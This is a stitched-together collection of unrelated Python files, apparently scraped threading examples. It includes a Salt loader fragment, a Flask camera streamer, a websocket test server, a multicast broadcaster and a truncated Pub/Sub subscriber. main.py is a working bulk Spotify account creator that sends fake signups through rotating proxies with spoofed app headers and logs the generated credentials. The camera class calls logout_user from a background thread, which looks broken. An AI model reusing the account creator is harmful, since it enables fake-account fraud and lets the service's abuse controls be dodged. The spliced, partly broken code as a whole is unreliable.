else:
# pylint: disable=no-member
loader = MODULE_KIND_MAP[desc[2]](mod_namespace, fpath)
spec = importlib.util.spec_from_file_location(
mod_namespace, fpath, loader=loader
)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = self.run(spec.loader.load_module)
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
except OSError:
raise
except ImportError as exc:
if "magic number" in str(exc):
error_msg = "Failed to import {} {}. Bad magic number. If migrating from Python2 to Python3, remove all .pyc files and try again.".format(
self.tag, name
)
log.warning(error_msg)
self.missing_modules[name] = error_msg
log.debug("Failed to import %s %s:\n", self.tag, name, exc_info=True)
self.missing_modules[name] = exc
return False
except Exception as error: # pylint: disable=broad-except
log.error(
"Failed to import %s %s, this is due most likely to a "
"syntax error:\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
except SystemExit as error:
try:
fn_, _, caller, _ = traceback.extract_tb(sys.exc_info()[2])[-1]
except Exception: # pylint: disable=broad-except
pass
else:
tgt_fn = os.path.join("salt", "utils", "process.py")
if fn_.endswith(tgt_fn) and "_handle_signals" in caller:
# Race conditon, SIGTERM or SIGINT received while loader
# was in process of loading a module. Call sys.exit to
# ensure that the process is killed.
sys.exit(salt.defaults.exitcodes.EX_OK)
log.error(
"Failed to import %s %s as the module called exit()\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
finally:
sys.path.remove(fpath_dirname)
self.__clean_sys_path()
loader_context = salt.loader_context.LoaderContext()
if hasattr(mod, "__salt_loader__"):
if not isinstance(mod.__salt_loader__, salt.loader_context.LoaderContext):
log.warning("Override __salt_loader__: %s", mod)
mod.__salt_loader__ = loader_context
else:
mod.__salt_loader__ = loader_context
if hasattr(mod, "__opts__"):
if not isinstance(mod.__opts__, salt.loader_context.NamedLoaderContext):
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = copy.deepcopy(mod.__opts__)
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
else:
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = {}
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
# pack whatever other globals we were asked to
for p_name, p_value in self.pack.items():
mod_named_context = getattr(mod, p_name, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(p_name, default)
if mod_named_context is None:
setattr(mod, p_name, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", p_name, mod)
setattr(mod, p_name, named_context)
else:
setattr(mod, p_name, named_context)
if self.pack_self is not None:
mod_named_context = getattr(mod, self.pack_self, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(self.pack_self, default)
if mod_named_context is None:
setattr(mod, self.pack_self, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", self.pack_self, mod)
setattr(mod, self.pack_self, named_context)
else:
setattr(mod, self.pack_self, named_context)
module_name = mod.__name__.rsplit(".", 1)[-1]
# Call a module's initialization method if it exists
module_init = getattr(mod, "__init__", None)
if inspect.isfunction(module_init):
try:
self.run(module_init, self.opts)
except TypeError as e:
log.error(e)
except Exception: # pylint: disable=broad-except
err_string = "__init__ failed"
log.debug(
"Error loading %s.%s: %s",
self.tag,
module_name,
err_string,
exc_info=True,
)
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
# if virtual modules are enabled, we need to look for the
# __virtual__() function inside that module and run it.
if self.virtual_enable:
virtual_funcs_to_process = ["__virtual__"] + self.virtual_funcs
for virtual_func in virtual_funcs_to_process:
(
virtual_ret,
module_name,
virtual_err,
virtual_aliases,
) = self._process_virtual(mod, module_name, virtual_func)
if virtual_err is not None:
log.trace(
"Error loading %s.%s: %s", self.tag, module_name, virtual_err
)
# if _process_virtual returned a non-True value then we are
# supposed to not process this module
if virtual_ret is not True and module_name not in self.missing_modules:
# If a module has information about why it could not be loaded, record it
self.missing_modules[module_name] = virtual_err
self.missing_modules[name] = virtual_err
return False
else:
virtual_aliases = ()
# If this is a proxy minion then MOST modules cannot work. Therefore, require that
# any module that does work with salt-proxy-minion define __proxyenabled__ as a list
# containing the names of the proxy types that the module supports.
#
# Render modules and state modules are OK though
if "proxy" in self.opts:
if self.tag in ["grains", "proxy"]:
if not hasattr(mod, "__proxyenabled__") or (
self.opts["proxy"]["proxytype"] not in mod.__proxyenabled__
and "*" not in mod.__proxyenabled__
):
err_string = "not a proxy_minion enabled module"
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
if getattr(mod, "__load__", False) is not False:
log.info(
"The functions from module '%s' are being loaded from the "
"provided __load__ attribute",
module_name,
)
# If we had another module by the same virtual name, we should put any
# new functions under the existing dictionary.
mod_names = [module_name] + list(virtual_aliases)
mod_dict = {
x: self.loaded_modules.get(x, self.mod_dict_class()) for x in mod_names
}
for attr in getattr(mod, "__load__", dir(mod)):
if attr.startswith("_"):
# private functions are skipped
continue
func = getattr(mod, attr)
if not inspect.isfunction(func) and not isinstance(func, functools.partial):
# Not a function!? Skip it!!!
continue
# Let's get the function name.
# If the module has the __func_alias__ attribute, it must be a
# dictionary mapping in the form of(key -> value):
# <real-func-name> -> <desired-func-name>
#
# It default's of course to the found callable attribute name
# if no alias is defined.
funcname = getattr(mod, "__func_alias__", {}).get(attr, attr)
for tgt_mod in mod_names:
try:
full_funcname = ".".join((tgt_mod, funcname))
except TypeError:
full_funcname = "{}.{}".format(tgt_mod, funcname)
# Save many references for lookups
# Careful not to overwrite existing (higher priority) functions
if full_funcname not in self._dict:
self._dict[full_funcname] = func
if funcname not in mod_dict[tgt_mod]:
setattr(mod_dict[tgt_mod], funcname, func)
mod_dict[tgt_mod][funcname] = func
self._apply_outputter(func, mod)
# enforce depends
try:
Depends.enforce_dependencies(self._dict, self.tag, name)
except RuntimeError as exc:
log.info(
"Depends.enforce_dependencies() failed for the following " "reason: %s",
exc,
)
for tgt_mod in mod_names:
self.loaded_modules[tgt_mod] = mod_dict[tgt_mod]
return True
def _load(self, key):
"""
Load a single item if you have it
"""
# if the key doesn't have a '.' then it isn't valid for this mod dict
if not isinstance(key, str):
raise KeyError("The key must be a string.")
if "." not in key:
raise KeyError("The key '{}' should contain a '.'".format(key))
mod_name, _ = key.split(".", 1)
with self._lock:
# It is possible that the key is in the dictionary after
# acquiring the lock due to another thread loading it.
if mod_name in self.missing_modules or key in self._dict:
return True
# if the modulename isn't in the whitelist, don't bother
if self.whitelist and mod_name not in self.whitelist:
log.error(
"Failed to load function %s because its module (%s) is "
"not in the whitelist: %s",
key,
mod_name,
self.whitelist,
)
raise KeyError(key)
def _inner_load(mod_name):
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and key in self._dict:
return True
return False
# try to load the module
ret = None
reloaded = False
# re-scan up to once, IOErrors or a failed load cause re-scans of the
# filesystem
while True:
try:
ret = _inner_load(mod_name)
if not reloaded and ret is not True:
self._refresh_file_mapping()
reloaded = True
continue
break
except OSError:
if not reloaded:
self._refresh_file_mapping()
reloaded = True
continue
return ret
def _load_all(self):
"""
Load all of them
"""
with self._lock:
for name in self.file_mapping:
if name in self.loaded_files or name in self.missing_modules:
continue
self._load_module(name)
self.loaded = True
def reload_modules(self):
with self._lock:
self.loaded_files = set()
self._load_all()
def _apply_outputter(self, func, mod):
"""
Apply the __outputter__ variable to the functions
"""
if hasattr(mod, "__outputter__"):
outp = mod.__outputter__
if func.__name__ in outp:
func.__outputter__ = outp[func.__name__]
def _process_virtual(self, mod, module_name, virtual_func="__virtual__"):
"""
Given a loaded module and its default name determine its virtual name
This function returns a tuple. The first value will be either True or
False and will indicate if the module should be loaded or not (i.e. if
it threw and exception while processing its __virtual__ function). The
second value is the determined virtual name, which may be the same as
the value provided.
The default name can be calculated as follows::
module_name = mod.__name__.rsplit('.', 1)[-1]
"""
# The __virtual__ function will return either a True or False value.
# If it returns a True value it can also set a module level attribute
# named __virtualname__ with the name that the module should be
# referred to as.
#
# This allows us to have things like the pkg module working on all
# platforms under the name 'pkg'. It also allows for modules like
# augeas_cfg to be referred to as 'augeas', which would otherwise have
# namespace collisions. And finally it allows modules to return False
# if they are not intended to run on the given platform or are missing
# dependencies.
virtual_aliases = getattr(mod, "__virtual_aliases__", tuple())
try:
error_reason = None
if hasattr(mod, "__virtual__") and inspect.isfunction(mod.__virtual__):
try:
start = time.time()
virtual_attr = getattr(mod, virtual_func)
virtual = self.run(virtual_attr)
if isinstance(virtual, tuple):
error_reason = virtual[1]
virtual = virtual[0]
if self.opts.get("virtual_timer", False):
end = time.time() - start
msg = "Virtual function took {} seconds for {}".format(
end, module_name
)
log.warning(msg)
except Exception as exc: # pylint: disable=broad-except
error_reason = (
"Exception raised when processing __virtual__ function"
" for {}. Module will not be loaded: {}".format(
mod.__name__, exc
)
)
log.error(error_reason, exc_info_on_loglevel=logging.DEBUG)
virtual = None
# Get the module's virtual name
virtualname = getattr(mod, "__virtualname__", virtual)
if not virtual:
# if __virtual__() evaluates to False then the module
# wasn't meant for this platform or it's not supposed to
# load for some other reason.
# Some modules might accidentally return None and are
# improperly loaded
if virtual is None:
log.warning(
"%s.__virtual__() is wrongly returning `None`. "
"It should either return `True`, `False` or a new "
"name. If you're the developer of the module "
"'%s', please fix this.",
mod.__name__,
module_name,
)
return (False, module_name, error_reason, virtual_aliases)
# At this point, __virtual__ did not return a
# boolean value, let's check for deprecated usage
# or module renames
if virtual is not True and module_name != virtual:
# The module is renaming itself. Updating the module name
# with the new name
log.trace("Loaded %s as virtual %s", module_name, virtual)
if virtualname != virtual:
# The __virtualname__ attribute does not match what's
# being returned by the __virtual__() function. This
# should be considered an error.
log.error(
"The module '%s' is showing some bad usage. Its "
"__virtualname__ attribute is set to '%s' yet the "
"__virtual__() function is returning '%s'. These "
"values should match!",
mod.__name__,
virtualname,
virtual,
)
module_name = virtualname
# If the __virtual__ function returns True and __virtualname__
# is set then use it
elif virtual is True and virtualname != module_name:
if virtualname is not True:
module_name = virtualname
except KeyError:
# Key errors come out of the virtual function when passing
# in incomplete grains sets, these can be safely ignored
# and logged to debug, still, it includes the traceback to
# help debugging.
log.debug("KeyError when loading %s", module_name, exc_info=True)
except Exception: # pylint: disable=broad-except
# If the module throws an exception during __virtual__()
# then log the information and continue to the next.
log.error(
"Failed to read the virtual function for %s: %s",
self.tag,
module_name,
exc_info=True,
)
return (False, module_name, error_reason, virtual_aliases)
return (True, module_name, None, virtual_aliases)
def run(self, method, *args, **kwargs):
"""
Run the method in this loader's context
"""
self._last_context = contextvars.copy_context()
return self._last_context.run(self._run_as, method, *args, **kwargs)
def _run_as(self, method, *args, **kwargs):
"""
Handle setting up the context properly and call the method
"""
self.parent_loader = None
try:
current_loader = salt.loader_context.loader_ctxvar.get()
except LookupError:
current_loader = None
if current_loader is not self:
self.parent_loader = current_loader
token = salt.loader_context.loader_ctxvar.set(self)
try:
return method(*args, **kwargs)
finally:
self.parent_loader = None
salt.loader_context.loader_ctxvar.reset(token)
def run_in_thread(self, method, *args, **kwargs):
"""
Run the function in a new thread with the context of this loader
"""
argslist = [self, method]
argslist.extend(args)
thread = threading.Thread(target=self.target, args=argslist, kwargs=kwargs)
thread.start()
return thread
@staticmethod
def target(loader, method, *args, **kwargs):
loader.run(method, *args, **kwargs)
def global_injector_decorator(inject_globals):
"""
Decorator used by the LazyLoader to inject globals into a function at
execute time.
globals
Dictionary with global variables to inject
"""
def inner_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
with salt.utils.context.func_globals_inject(f, **inject_globals):
return f(*args, **kwargs)
return wrapper
return inner_decorator
|
base_camera.py
|
from flask_login import logout_user
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
if time.time() - BaseCamera.last_access > 10:
frames_iterator.close()
logout_user() # logout the current user too
print('Stopping camera thread due to inactivity.')
break
BaseCamera.thread = None
|
humming_ws_server.py
|
import asyncio
import unittest.mock
from threading import Thread
import websockets
from test.integration.humming_web_app import get_open_port
import json
from urllib.parse import urlparse
class HummingWsServerFactory:
_orig_ws_connect = websockets.connect
_ws_servers = {}
host = "127.0.0.1"
# url_host_only is used for creating one HummingWSServer to handle all websockets requests and responses for
# a given url host.
url_host_only = False
@staticmethod
def get_ws_server(url):
if HummingWsServerFactory.url_host_only:
url = urlparse(url).netloc
return HummingWsServerFactory._ws_servers.get(url)
@staticmethod
def start_new_server(url):
port = get_open_port()
ws_server = HummingWsServer(HummingWsServerFactory.host, port)
if HummingWsServerFactory.url_host_only:
url = urlparse(url).netloc
HummingWsServerFactory._ws_servers[url] = ws_server
ws_server.start()
return ws_server
@staticmethod
def reroute_ws_connect(url, **kwargs):
ws_server = HummingWsServerFactory.get_ws_server(url)
if ws_server is None:
return HummingWsServerFactory._orig_ws_connect(url, **kwargs)
kwargs.clear()
return HummingWsServerFactory._orig_ws_connect(f"ws://{ws_server.host}:{ws_server.port}", **kwargs)
@staticmethod
async def send_str(url, message, delay=0):
if delay > 0:
await asyncio.sleep(delay)
ws_server = HummingWsServerFactory.get_ws_server(url)
await ws_server.websocket.send(message)
@staticmethod
def send_str_threadsafe(url, msg, delay=0):
ws_server = HummingWsServerFactory.get_ws_server(url)
asyncio.run_coroutine_threadsafe(HummingWsServerFactory.send_str(url, msg, delay), ws_server.ev_loop)
@staticmethod
async def send_json(url, data, delay=0):
try:
if delay > 0:
await asyncio.sleep(delay)
ws_server = HummingWsServerFactory.get_ws_server(url)
message = json.dumps(data)
await ws_server.websocket.send(message)
except Exception as e:
print(f"HummingWsServerFactory Error: {str(e)}")
raise e
@staticmethod
def send_json_threadsafe(url, data, delay=0):
ws_server = HummingWsServerFactory.get_ws_server(url)
asyncio.run_coroutine_threadsafe(HummingWsServerFactory.send_json(url, data, delay), ws_server.ev_loop)
class HummingWsServer:
def __init__(self, host, port):
self.ev_loop: None
self._started: bool = False
self.host = host
self.port = port
self.websocket = None
self.stock_responses = {}
def add_stock_response(self, request, json_response):
self.stock_responses[request] = json_response
async def _handler(self, websocket, path):
self.websocket = websocket
async for msg in self.websocket:
stock_responses = [v for k, v in self.stock_responses.items() if k in msg]
if len(stock_responses) > 0:
await websocket.send(json.dumps(stock_responses[0]))
print('websocket connection closed')
return self.websocket
@property
def started(self) -> bool:
return self._started
def _start(self):
self.ev_loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.ev_loop)
asyncio.ensure_future(websockets.serve(self._handler, self.host, self.port))
self.ev_loop.run_forever()
async def wait_til_started(self):
while not self._started:
await asyncio.sleep(0.1)
async def _stop(self):
self.port = None
self._started = False
self.ev_loop.stop()
def start(self):
if self.started:
self.stop()
thread = Thread(target=self._start)
thread.daemon = True
thread.start()
def stop(self):
asyncio.run_coroutine_threadsafe(self._stop(), self.ev_loop)
class HummingWsServerTest(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.ev_loop: asyncio.AbstractEventLoop = asyncio.get_event_loop()
cls.ws_server = HummingWsServerFactory.start_new_server("ws://www.google.com/ws/")
cls._patcher = unittest.mock.patch("websockets.connect", autospec=True)
cls._mock = cls._patcher.start()
cls._mock.side_effect = HummingWsServerFactory.reroute_ws_connect
@classmethod
def tearDownClass(cls) -> None:
cls._patcher.stop()
async def _test_web_socket(self):
uri = "ws://www.google.com/ws/"
async with websockets.connect(uri) as websocket:
await HummingWsServerFactory.send_str(uri, "aaa")
answer = await websocket.recv()
print(answer)
self.assertEqual("aaa", answer)
await HummingWsServerFactory.send_json(uri, data={"foo": "bar"})
answer = await websocket.recv()
print(answer)
answer = json.loads(answer)
self.assertEqual(answer["foo"], "bar")
await self.ws_server.websocket.send("xxx")
answer = await websocket.recv()
print(answer)
self.assertEqual("xxx", answer)
def test_web_socket(self):
asyncio.get_event_loop().run_until_complete(self._test_web_socket())
if __name__ == '__main__':
unittest.main()
|
t04.py
|
import threading
import time
def loop():
print(f"thread {threading.currentThread().name} is running...")
n = 0
while n < 5:
n = n + 1
print(f"thread {threading.currentThread().name} >>> {n}")
time.sleep(1)
print(f"thread {threading.currentThread().name} ended")
print(f"thread {threading.currentThread().name} is running...")
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print(f"thread {threading.currentThread().name} ended")
|
main.py
|
from sys import stdout
from requests import post
from os import system, _exit, path
from random import choice, randint
from colors import green, red, reset
from time import time, sleep, strftime, gmtime
from threading import Thread, Lock, active_count
from string import ascii_letters, ascii_lowercase, digits
system('cls && title [Spotify Account Creator] - Main Menu')
headers = {'User-agent': 'S4A/2.0.15 (com.spotify.s4a; build:201500080; iOS 13.4.0) Alamofire/4.9.0', 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8', 'Accept': 'application/json, text/plain;q=0.2, */*;q=0.1', 'App-Platform': 'IOS', 'Spotify-App': 'S4A', 'Accept-Language': 'en-TZ;q=1.0', 'Accept-Encoding': 'gzip;q=1.0, compress;q=0.5', 'Spotify-App-Version': '2.0.15'}
domains = ['gmail.com', 'yahoo.com', 'hotmail.com', 'hotmail.co.uk', 'hotmail.fr', 'outlook.com', 'icloud.com', 'mail.com', 'live.com', 'yahoo.it', 'yahoo.ca', 'yahoo.in', 'live.se', 'orange.fr', 'msn.com', 'mail.ru', 'mac.com']
lock = Lock()
class Main:
def __init__(self):
self.variables = {
'proxies': [],
'proxy_num': 0,
'created': 0,
'retries': 0,
'cpm': 0,
'unlimited': False
}
logo = '''
______ __ __ ______ ______ __
/ \ | \ | \/ \ / \ | \
| ▓▓▓▓▓▓\ ______ ______ _| ▓▓_ \▓▓ ▓▓▓▓▓▓\__ __ | ▓▓▓▓▓▓\ ______ _______ ______ ______ ______ _| ▓▓_ ______ ______
| ▓▓___\▓▓/ \ / \| ▓▓ \ | \ ▓▓_ \▓▓ \ | \ | ▓▓ __\▓▓/ \| \ / \ / \ | \| ▓▓ \ / \ / \
\▓▓ \| ▓▓▓▓▓▓\ ▓▓▓▓▓▓\\▓▓▓▓▓▓ | ▓▓ ▓▓ \ | ▓▓ | ▓▓ | ▓▓| \ ▓▓▓▓▓▓\ ▓▓▓▓▓▓▓\ ▓▓▓▓▓▓\ ▓▓▓▓▓▓\ \▓▓▓▓▓▓\\▓▓▓▓▓▓ | ▓▓▓▓▓▓\ ▓▓▓▓▓▓\
_\▓▓▓▓▓▓\ ▓▓ | ▓▓ ▓▓ | ▓▓ | ▓▓ __| ▓▓ ▓▓▓▓ | ▓▓ | ▓▓ | ▓▓ \▓▓▓▓ ▓▓ ▓▓ ▓▓ | ▓▓ ▓▓ ▓▓ ▓▓ \▓▓/ ▓▓ | ▓▓ __| ▓▓ | ▓▓ ▓▓ \▓▓
| \__| ▓▓ ▓▓__/ ▓▓ ▓▓__/ ▓▓ | ▓▓| \ ▓▓ ▓▓ | ▓▓__/ ▓▓ | ▓▓__| ▓▓ ▓▓▓▓▓▓▓▓ ▓▓ | ▓▓ ▓▓▓▓▓▓▓▓ ▓▓ | ▓▓▓▓▓▓▓ | ▓▓| \ ▓▓__/ ▓▓ ▓▓
\▓▓ ▓▓ ▓▓ ▓▓\▓▓ ▓▓ \▓▓ ▓▓ ▓▓ ▓▓ \▓▓ ▓▓ \▓▓ ▓▓\▓▓ \ ▓▓ | ▓▓\▓▓ \ ▓▓ \▓▓ ▓▓ \▓▓ ▓▓\▓▓ ▓▓ ▓▓
\▓▓▓▓▓▓| ▓▓▓▓▓▓▓ \▓▓▓▓▓▓ \▓▓▓▓ \▓▓\▓▓ _\▓▓▓▓▓▓▓ \▓▓▓▓▓▓ \▓▓▓▓▓▓▓\▓▓ \▓▓ \▓▓▓▓▓▓▓\▓▓ \▓▓▓▓▓▓▓ \▓▓▓▓ \▓▓▓▓▓▓ \▓▓
| ▓▓ | \__| ▓▓
| ▓▓ \▓▓ ▓▓
\▓▓ \▓▓▓▓▓▓
'''
print('%s%s' % (green(), logo))
print('\n\n %s[%s1%s] HTTP\n [%s2%s] SOCKS4\n [%s3%s] SOCKS5\n\n%s> %sSelect a Proxy Type%s: ' % (green(), reset(), green(), reset(), green(), reset(), green(), reset(), green(), reset()), end = '')
self.proxy_type = str(input())
if self.proxy_type.upper() in ['1', 'HTTP']:
self.proxy_type = 'http'
elif self.proxy_type.upper() in ['2', 'SOCKS4']:
self.proxy_type = 'socks4'
elif self.proxy_type.upper() in ['3', 'SOCKS5']:
self.proxy_type = 'socks5'
else:
print('\n%s> %sInvalid input%s.' % (reset(), red(), reset()))
system('title [Spotify Account Creator] - Exiting . . .')
sleep(3)
_exit(0)
print('%s> %sAmount to create (empty for unlimited)%s: ' % (reset(), green(), reset()), end = '')
self.amount = str(input())
print()
if self.amount == '':
self.variables['unlimited'] = True
self.amount = 0
elif self.amount != '' and not self.amount.isdigit():
print('%s> %sInvalid input%s.' % (reset(), red(), reset()))
system('title [Spotify Account Creator] - Exiting . . .')
sleep(3)
_exit(0)
def setup(self):
if path.exists('Proxies.txt'):
with open('Proxies.txt', 'r', encoding = 'UTF-8') as f:
for line in f.read().splitlines():
if line != '':
self.variables['proxies'].append(line)
if len(self.variables['proxies']) == 0:
self.error_import(False)
else:
self.error_import(True)
def error_import(self, create):
if create:
open('Proxies.txt', 'a').close()
print('%s> %sPaste your proxies inside Proxies.txt%s!' % (reset(), red(), reset()))
system('title [Spotify Account Creator] - Exiting . . .')
sleep(3)
_exit(0)
def write(self, arg):
lock.acquire()
stdout.flush()
stdout.write('%s\n' % (arg.encode('ascii', 'replace').decode())) # Get less printing bugs on Windows
lock.release()
def cpm_counter(self):
if self.variables['unlimited']:
while True:
old = self.variables['created']
sleep(4)
new = self.variables['created']
self.variables['cpm'] = ((new - old) * 15)
else:
while self.variables['created'] != int(self.amount):
old = self.variables['created']
sleep(4)
new = self.variables['created']
self.variables['cpm'] = ((new - old) * 15)
def update_title(self):
if self.variables['unlimited']:
while True:
elapsed = strftime('%H:%M:%S', gmtime(time() - self.start))
system('title [Spotify Account Creator] - Created: %s ^| Retries: %s ^| CPM: %s ^| Time Elapsed: %s ^| Threads: %s' % (self.variables['created'], self.variables['retries'], self.variables['cpm'], elapsed, (active_count() - 2)))
sleep(0.4)
else:
while self.variables['created'] != int(self.amount):
elapsed = strftime('%H:%M:%S', gmtime(time() - self.start))
system('title [Spotify Account Creator] - Created: %s/%s ^| Retries: %s ^| CPM: %s ^| Time Elapsed: %s ^| Threads: %s' % (self.variables['created'], self.amount, self.variables['retries'], self.variables['cpm'], elapsed, (active_count() - 2)))
sleep(0.4)
elapsed = strftime('%H:%M:%S', gmtime(time() - self.start))
system('title [Spotify Account Creator] - Created: %s/%s ^| Retries: %s ^| CPM: %s ^| Time Elapsed: %s ^| Threads: %s' % (self.variables['created'], self.amount, self.variables['retries'], self.variables['cpm'], elapsed, (active_count() - 2)))
def retry(self):
self.variables['retries'] += 1
self.creator(choice(self.variables['proxies']))
def creator(self, proxy):
email = '%s@%s' % (''.join(choice(ascii_lowercase + digits) for _ in range(randint(7, 10))), choice(domains))
password = ''.join(choice(ascii_letters + digits) for _ in range(randint(8, 14)))
birth_year = randint(1970, 2005)
birth_month = randint(1, 12)
birth_day = randint(1, 28)
gender = choice(['male', 'female'])
data = 'creation_point=lite_7e7cf598605d47caba394c628e2735a2&password_repeat=%s&platform=Android-ARM&iagree=true&password=%s&gender=%s&key=a2d4b979dc624757b4fb47de483f3505&birth_day=%s&birth_month=%s&email=%s&birth_year=%s' % (password, password, gender, birth_day, birth_month, email, birth_year)
try:
create = post('https://spclient.wg.spotify.com/signup/public/v1/account', data = data, headers = headers, proxies = {'https': '%s://%s' % (self.proxy_type, proxy)}, timeout = 5)
if create.json()['status'] == 1:
username = create.json()['username']
if username != '':
self.write('%s[%sCREATED%s] %s:%s | Username: %s | Gender: %s | Date of Birth: %s/%s-%s' % (green(), reset(), green(), email, password, username, gender.replace(gender[0], gender[0].upper()), birth_day, birth_month, birth_year))
with open('Created [RAW].txt', 'a', encoding = 'UTF-8') as f: f.write('%s:%s\n' % (email, password))
with open('Created [CAPTURE].txt', 'a', encoding = 'UTF-8') as f: f.write('%s:%s | Username: %s | Gender: %s | Date of Birth: %s/%s-%s\n' % (email, password, username, gender.replace(gender[0], gender[0].upper()), birth_day, birth_month, birth_year))
self.variables['created'] += 1
else:
self.retry()
else:
self.retry()
except:
self.retry()
def multi_threading(self):
self.start = time()
Thread(target = self.cpm_counter).start()
Thread(target = self.update_title).start()
if self.variables['unlimited']:
while True:
try:
Thread(target = self.creator, args = (self.variables['proxies'][self.variables['proxy_num']],)).start()
except:
continue
self.variables['proxy_num'] += 1
if self.variables['proxy_num'] >= len(self.variables['proxies']):
self.variables['proxy_num'] = 0
else:
num = 0
while num < int(self.amount):
try:
Thread(target = self.creator, args = (self.variables['proxies'][self.variables['proxy_num']],)).start()
except:
continue
num += 1
self.variables['proxy_num'] += 1
if self.variables['proxy_num'] >= len(self.variables['proxies']):
self.variables['proxy_num'] = 0
while self.variables['created'] != int(self.amount):
continue
print('\n%s> %sFinished%s.' % (reset(), green(), reset()))
system('pause >NUL')
print('> Exiting . . .')
sleep(3)
_exit(0)
if __name__ == '__main__':
main = Main()
main.setup()
main.multi_threading()
|
broadcaster.py
|
import socket
import struct
from time import time, sleep
from threading import Thread
from dbus import DBusException
DEFAULT_PORT = 1666
DEFAULT_HOST = '224.0.0.160'
DEFAULT_INTERVAL = 1.0 # seconds
class Broadcaster:
def __init__(self, omxplayer, verbose=False, interval=DEFAULT_INTERVAL, host=DEFAULT_HOST, port=DEFAULT_PORT,
background=True, interface=None):
# config
self.player = omxplayer
self.verbose = verbose if type(verbose) is bool else False
self.interval = interval if type(interval) in (int, float) else DEFAULT_INTERVAL
host = self.test_host(host)
port = port if type(port) is int else DEFAULT_PORT
self.multicast = (host, port)
self.background = background if type(background) is bool else True
self.interface = interface
# attributes
self.socket = None
self.next_broadcast_time = 0
self.update_thread = None
self.message = " "
while self.setup() is False:
sleep(1)
if self.background is True:
self.start_thread()
def __del__(self):
self.destroy()
def test_host(self, host):
host_test = host.split('.', 3)
try:
all(int(item) for item in host_test)
if len(host_test) == 4:
return host
except:
return DEFAULT_HOST
def setup(self):
# create socket connections
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
ttl = struct.pack('b', 32)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
# enable broadcasting
if self.interface is not None:
self.socket.setsockopt(socket.SOL_SOCKET, 25, self.interface)
def start_thread(self):
self.update_thread = Thread(target=self.update_loop)
self.update_thread.start()
def destroy(self):
if self.socket:
self.socket.close()
self.socket = None
def update_loop(self):
while True:
try:
self.update()
except DBusException:
self.socket.close()
break
def update(self):
t = time()
# time for next broadcast?
if t >= self.next_broadcast_time:
# broadcast
self._broadcast_position()
# "schedule" next broadcast
self.next_broadcast_time = t + self.interval
def _broadcast_position(self):
duration = self.player.duration()
playback_status = self.player.playback_status()
p = self.player.position()
if not p and not duration and not playback_status:
return
try:
self.socket.sendto(("%s%%%s%%%s" % (str(p), duration, playback_status)).encode('utf-8'), self.multicast)
self.message = 'broadcast position: %.2f/%.2f Playback:%s' % (p, duration, playback_status)
except socket.error:
self.message = "Network is unreachable"
if self.verbose:
print(self.message)
|
pull_subscriber.py
|
# -*- coding: utf-8 -*-
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals
)
import threading
import signal
import time
from pubsub_controller.settings import (
GCP_PROJECT_ID,
POLLING_TIME,
SUBSCRIPTION_ID,
)
from pubsub_controller.utils.log import log, error_log
